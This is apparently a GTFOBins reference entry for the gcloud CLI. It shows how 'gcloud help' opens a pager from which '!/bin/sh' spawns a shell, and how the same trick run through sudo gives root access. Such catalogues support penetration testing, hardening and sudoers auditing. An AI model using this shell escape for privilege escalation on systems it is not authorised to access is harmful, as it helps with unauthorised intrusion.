GTFOBins.github.io/_gtfobins/gcloud.md

14 lines
397 B
Markdown
Raw Normal View History

---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
gcloud help
!/bin/sh
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo gcloud help
!/bin/sh
---